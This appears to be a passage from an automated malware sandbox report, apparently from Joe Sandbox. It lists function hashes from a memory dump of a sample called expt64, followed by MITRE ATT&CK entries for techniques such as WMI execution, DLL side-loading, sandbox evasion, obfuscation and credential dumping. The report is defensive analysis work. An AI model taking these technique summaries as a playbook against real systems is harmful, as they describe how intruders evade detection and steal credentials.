Instruction ID: 3c3a05afe9c7473ede57b72b610cb0efa43eab42f1aea46d2660ec1d103afb7c
Opcode Fuzzy Hash: b87176a176d62dfcb747c14b90c2cd58c9e3e0c8d8af7f2b425b8e9404ac3ea2
Instruction Fuzzy Hash: B131A1729093209FD710CF19C94476BF7E6EFC5704F069C29E984AB251D3729949CB91

Function 0232F68A Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
Instruction ID: ecbbd119a299a3d87d14a0d071bb25916cd2de99f49d77ab841bb5400fa72e5a
Opcode Fuzzy Hash: 807bec0362dbcb8b1f2841beb8f7528c0114618da1fc548bdf9fe4127f2aab19
Instruction Fuzzy Hash: 8D31F472F506258BDB1CCFADCC523FEB6A2EB89304F18512ED986E7790CA7859018794

Function 0232A86C Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction ID: ee4b9be8c0b9a4dad903e9715ef67d51a92ef6a8a70aeaa9b13a673d374445d2
Opcode Fuzzy Hash: 19c2ecff3853d05a80752d91f1f2254589cb319cabc824830e2b7081d4dea16a
Instruction Fuzzy Hash: F631FC73A187384BC7195D3D8C9027E76A29BC6630F1A873DEEB69B3D1DA344C0586D1

Function 022F11BF Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction ID: 3ae76be266bce0fe05e9cccfea5a690c79f4be6dc1d7aab839e1927e68129d76
Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
Instruction Fuzzy Hash: 1D518D74A10219DFCB48CF88C590AAEB7B2FF88314F608199D815AB355D371AA91CFA0

Function 02309A4D Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3918ec41326d26505f23b902e959fe368e2784fa6e0b00be34dd270d4063d6d1
Instruction ID: 6845d5ec7d525d6d947589396d7997b0b4f081f9ea311bc316ebff27ec0c9f10
Opcode Fuzzy Hash: 3918ec41326d26505f23b902e959fe368e2784fa6e0b00be34dd270d4063d6d1
Instruction Fuzzy Hash: 2531027260C34187D315CE25C8D03A6B7D2EFDA714F1C4A2CE4C667396D6389905CB66

Function 0230D7BB Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
Instruction ID: 9631cddfbfd45b03619295c4a1b812ed8964cd927628a818880213bacd19f5ec
Opcode Fuzzy Hash: 7d25e4151b20e1252b310cbf19ae9d376f513415a955b05fc74d62dd8d03d4cb
Instruction Fuzzy Hash: 9E310936511700CFD7258F25C8E0612B7E2FF8A314B29D1ADC1964BBE5D739E402CB15

Function 02316B6C Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7e7447134e07313ac73793f1f8c23eb9299d6d2d6da07bd0b8d0897a83b2a0
Instruction ID: 957f7a7eddfd0885da587a85c3fc50b1000b20132bf72661bd0a8f8b524a40e7
Opcode Fuzzy Hash: 0e7e7447134e07313ac73793f1f8c23eb9299d6d2d6da07bd0b8d0897a83b2a0
Instruction Fuzzy Hash: B4318F36E00226CBCB18CF99C4C09ADB3B6FF89710B1A9059C8406B361DB356D52CB54

Function 0230819C Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108ceb1db69074b9a98829a843e8be9664ffd79e819e71ac05f6f9efedbd05e
Instruction ID: 46cf68bde3f2b5777fad82d299c8f8dad4f6ed36d77850c48db3ce9258069f7e
Opcode Fuzzy Hash: 4108ceb1db69074b9a98829a843e8be9664ffd79e819e71ac05f6f9efedbd05e
Instruction Fuzzy Hash: BC21DF766187009BD728CF28C8D06BFB3EAAB89300F15582DE5C6C3290DB7198958BA1

Function 02331E2C Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e266b19bbec9a78cd7d4fb66e387f7728f941806f9f00e215d9299ba8311c14e
Instruction ID: d90a65f2afe78f0ea9258e393100e62747da091430913eef04d2455db31c8430
Opcode Fuzzy Hash: e266b19bbec9a78cd7d4fb66e387f7728f941806f9f00e215d9299ba8311c14e
Instruction Fuzzy Hash: 81218B7AB042015FC7258F15CC80AFEF3A6EBC5714F18853CD9C847264DBB29A15C351

Function 0231ABDD Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a832035576172da004616a5c86af3d27037de829c6635a66a5ed5ffcd95d1b62
Instruction ID: 3549098ab635458a0865c7fb9ebf69e478ac7d4b6995ad940d880bd2e48d05a8
Opcode Fuzzy Hash: a832035576172da004616a5c86af3d27037de829c6635a66a5ed5ffcd95d1b62
Instruction Fuzzy Hash: 9F11C471A0E2209FD7398B58C840B3BB3A6EB46706F46842CE985DB262C732DC51D799

Function 02307978 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20740621c582a67b5fe4fe9c6e8dbb633058f5a357e88bb783a791dff0ba5241
Instruction ID: 8b642eed634eaa6dc1459ec75092c3d224c291c4bc6f478df3e08fae6a8bb804
Opcode Fuzzy Hash: 20740621c582a67b5fe4fe9c6e8dbb633058f5a357e88bb783a791dff0ba5241
Instruction Fuzzy Hash: 9721E1356483009BE364CF29CC9076AF3E2BBC9320F15582CD4C8D3390DB72A9418769

Function 023078B8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 895eb520f44d7ceaa17a7be624f886b56649eec452fa36ab78d0277ccb12c97b
Instruction ID: d0192bc3f0634b2bcbbdbcec059f28c7d42278f55715ac21fd504e29ce5d56c1
Opcode Fuzzy Hash: 895eb520f44d7ceaa17a7be624f886b56649eec452fa36ab78d0277ccb12c97b
Instruction Fuzzy Hash: 3A110276A146104BD728CB28CC9077AF2E2ABCA314F5A553CA9C9A32D1DB716840C668

Function 0231F012 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
Instruction ID: 77191440c2eb7fcd66b4e92bab7873402211b75a0ed6ef6570bc6226e259dd92
Opcode Fuzzy Hash: 865dbfc94376fd9eda7bada6642632c65b23654f0560e6e8f497fc09db05edbb
Instruction Fuzzy Hash: 9C210A7AA2532047CB2CCF39D8A96BAE2A2EB91300F19E53DD442E73A0FF3485008745

Function 022F11BE Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction ID: f3669ae5ca00969a3a6af4545a14b747c0a56b891d5113261df01893be7bbe11
Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
Instruction Fuzzy Hash: B7319274E00219DFCB48CF98C590AAEFBB1FF48314F208599D815AB345D371AA92CF90

Function 023307CB Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d124be0028ec685c9815b52e81765ced54a4cedaa49db59ed7cd779079d7846
Instruction ID: 52ec5e81f8d9940396e6777a19dbf5d2601f9e576eb00047ac91f3777b52ebcb
Opcode Fuzzy Hash: 3d124be0028ec685c9815b52e81765ced54a4cedaa49db59ed7cd779079d7846
Instruction Fuzzy Hash: 0201D4727103114FD3188FA8C4A17A733A3EB89704F12A0B99E85EF3A2CBF615518785

Function 0232688C Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 683ccce210fadf61b8d5dba54af251d5355187583a5bf8a5d55e1d9825b6a3bd
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 7811C233A051F04EC3168D3C8441565BFA70E93635B2983D9E4F89B2D2C6238D8E8B64

Function 0231B9AC Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction ID: d0caf6203e707d9a12d1894ae59e0a68fd4423cbebccc1c33a7baa35a92a47f5
Opcode Fuzzy Hash: 875c8872e886c9a6df03e5378ed413a697544a5c3f170caf45db0f60b7c9a7b6
Instruction Fuzzy Hash: 260171F171034287DB34AE6488C0B37F6BAAF84708F19483CD94957245EB75E809CAA5

Function 0232D2CC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
Instruction ID: dca9cbd2046f5bf62ceb4a97dc1255a8a58babc5efaadf73cc354b1318f4c903
Opcode Fuzzy Hash: 754b1fdeed7a772bc9ce9a585551eee55588dd48648c9e799ac489748c070118
Instruction Fuzzy Hash: 9711E53511831C9FC220AB54DD4586BB7AAFFDA319F140428D6C457230E332E968CB95

Function 022FBCD2 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
Instruction ID: 02ddeb635e61673fd7c0dfd73bcd2aa7c3441928628d65e4c72f9fe90894170f
Opcode Fuzzy Hash: 2194485ee7e9aaef04238bd0955ff54d561839f337ec04b75cafd92edaf81f56
Instruction Fuzzy Hash: 76115632A647428FD7744FAAC410371F7F1AB8A21872CC92C95D39B719DB749401CF45

Function 02316730 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
Instruction ID: b29d5f6a40860a0778b495f4a9ebdf8f8492d10551f62d2f35c9b35a6fd4cf96
Opcode Fuzzy Hash: 3d668db2a39d0c58336a571a08f283b7c17e072167910f4d6009b41effca224b
Instruction Fuzzy Hash: 9901D4A4624422A6D72D9F38D51147AB693FFD9300714B63E8082C3AA9EF3886208748

Function 023179BA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
Instruction ID: 922f550c7d5de391a7eee9aaa3178ae58a65e5b9aa97d02e7f0061f25baac2ad
Opcode Fuzzy Hash: 8473c85886807e6bc29514394763af4b2039333101efc46837769cd7ff94ce77
Instruction Fuzzy Hash: 87019232A192109BE7288F14CD0073AB3E1EB5AB04F0A556CE889A73A5D331DD15CB49

Function 0231B461 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
Instruction ID: f0d96a7729b09c623e3d412637276cbc49dffe5312b6aa939042d4754d5111ac
Opcode Fuzzy Hash: 479373be1e121a7faa6e3bd242e7a90329f0f24191153999f53bc99e68dfe5f2
Instruction Fuzzy Hash: 0D11A331A28320DBD7248F10C98177AF3B2FF95704F41952CED8527261D3359C418796

Function 023179BC Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
Instruction ID: 13d243925fdfc761482a32728078978c03276153ddb5636bc01a2b6b5791b192
Opcode Fuzzy Hash: 3a988fe037fd612b4c48d6a54066d194f5add051878c06eb8d1dc27ab7f058bd
Instruction Fuzzy Hash: 93118B359183208BCB28CF24C84037AB3F0BF4AB05F4A666DEC89AB390D7309E05C749

Function 023304EF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
Instruction ID: 6b1dbd3feabdfcf029a11b98956076a72cb5bd1db8864535e45cf3428567890e
Opcode Fuzzy Hash: 7e0eb08d5b3252200ba858cb0dbd191acbb107141d47f76ae1cf0deae4e99271
Instruction Fuzzy Hash: 4E01FD36A187158FD750AF28DC003AAB3E0AB84320F0A543D8AD5E3761EB78E8009684

Function 0232E81C Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
Instruction ID: 6ba7a0c3736de13d7cd5de189965f422c0b7c3d6264a2e887b28b9656a69bd6a
Opcode Fuzzy Hash: eb3be7d817d82fdefde71abed4f6488080adf443fa0ae3ad428bc58e6f56e05f
Instruction Fuzzy Hash: 8901D636D15A604BD319CF38CC1039673E6AB86305F098538DA45E7798DB7A98508684

Function 022F0F1F Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction ID: 35f6f6cb44cc0fcded02d2f2cbb4f2e6e8ceb01395e304c4d4ed19b61d9818c7
Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
Instruction Fuzzy Hash: B601FB34A20109EFCB54DF94C284AACF7B2FB44314F2082A9E9059B399CB31AF81DB40

Function 02330263 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
Instruction ID: d01f651dfe7ebf7cc472ea8873aae9f3ac24b3328c4e7ea08f173b6033e52a34
Opcode Fuzzy Hash: 4fadea260efd188fa37194c97d808d0f8342bb959896949141ba2e03d0f00f63
Instruction Fuzzy Hash: 4DF0EC36AE6B258AD3502F34C8003B5F3A1FFC6305F0A5438C8C453691DAB96645D3C5

Function 02330287 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
Instruction ID: 887eeff1e35ccd39ab6b6085a2898952bf585969c79b85d1816934a30a1eee36
Opcode Fuzzy Hash: 41c64a27492023317bfe340e89d84a1a068089ead8bdec49ccc3fa352ce3cf3e
Instruction Fuzzy Hash: F5F0EC32AE6B158ED3506F34C8003B5F3A2FFC2315F0A5438C8C4132D1DAB96545D385

Function 023167CF Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
Instruction ID: bccbc8219c2a1f690ac272bdc469585e9f9fb0a7299531a63a2b503f464aaebe
Opcode Fuzzy Hash: 7bb2be1f52fb94bbc8aa53112f6c7e48271192bd10a980babc9053e326529e98
Instruction Fuzzy Hash: C4F0A737D405304BE7148A18CD1039573A19FCA311F079570CC4CBB696D67A5C058784

Function 022FBF5F Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction ID: bae0f17c499c8538587101fc79fe5062e7aba0fbc5f9df691d55fbaf32910c34
Opcode Fuzzy Hash: c8d4ec5a897944de9ccb49b367769b78272b2d828bddb0ac0c15959bc6145835
Instruction Fuzzy Hash: 54D01223D454344BC7208D6CC8811F9B2B65B95211F4553668451B7589D969D81A4684

Function 022FBF13 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22f0000_expt64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
Instruction ID: e3989d077634a48908df7aa544cddc51b682a82f7388479aad2c488c47eab6c3
Opcode Fuzzy Hash: a7801a348dfb445b8529d839e4b4c2f9d4d14aedce63be36fe840cd4680e2497
Instruction Fuzzy Hash: 79D01235E553428FDB05CF68E4C177BB7719B5B204F58582CC152F3352C220E416861C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
